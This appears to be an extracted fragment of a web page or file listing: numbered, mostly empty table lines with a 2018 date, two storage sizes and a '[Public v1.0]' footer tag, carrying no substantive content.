1549 | 20-05-2018
1550 | |
1551 |
1552 | 28.27 GB
1553 | |
1554 |
1555 | 10.51 GB
1556 | |
1557 | |
1558 |
1559 | |
1560 |
1561 | |
1562 |
1563 |
1564 |
1565 |
1566 |
1567 |
1568 |
1569 |
1585 | |
1586 |
1587 |
1588 |
1589 |
1590 |
1612 | |
1613 |
1614 |
1617 |
1618 |
1619 |
1620 | |
1631 |
1632 |
1643 | |
1644 |
1645 |
1646 | |
1657 |
1658 |
1672 | |
1673 |
1674 | |
1716 |
1831 |
1832 |
1833 |
1850 | |
1851 |
1852 |
1853 | | |
1854 |
1855 |
1856 |
1857 |
1858 |
1885 | |
1886 |
1887 | | |
1888 |
1889 |
1890 |
1891 |
1918 | |
1919 |
1920 | | |
1921 |
1946 | |
1947 | | |
1948 |
1949 |
1950 |
1951 |
1995 |
1996 |
1997 |
2027 |
2028 |
2029 |
2080 | |
2081 | | |
2082 | |
2083 |
2084 | |
2085 |
2086 | .:[Public v1.0]:.
2087 |
2088 |
2089 |
--------------------------------------------------------------------------------